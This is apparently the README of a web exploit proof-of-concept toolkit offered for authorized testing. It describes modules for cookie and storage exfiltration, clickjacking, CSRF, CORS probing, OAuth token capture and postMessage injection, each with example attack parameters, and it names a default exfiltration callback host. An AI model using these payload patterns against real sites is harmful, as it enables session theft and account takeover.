Reusable exploit PoC templates for authorized security testing.
Exfiltrates cookies, DOM, localStorage, and URL data. Triple-channel delivery (image, beacon, fetch).
?exfil=...&tag=name&grab=cookies,dom,storage
Transparent iframe overlay with configurable bait text and opacity.
?target=https://victim.com/settings&opacity=0.0001&label=Click+Here
Form-based and JSON-body CSRF with auto-submit. Supports GET/POST/PUT/DELETE.
?action=https://api.victim.com/update&method=POST&fields=email:evil@attacker.com
Tests CORS misconfiguration with credentialed cross-origin requests. Auto-analyzes response headers.
?target=https://api.victim.com/user&credentials=true
Landing page for redirect chains. Captures tokens from query params and hash fragments (OAuth/OIDC).
?exfil=...&tag=oidc&redirect=https://legit-site.com
Iframes a target and captures/injects postMessages. Listen, inject, or both modes.
?target=https://victim.com/embedded&mode=both&inject={"action":"test"}
All callbacks default to redirect.totally-not-malware.com/exfil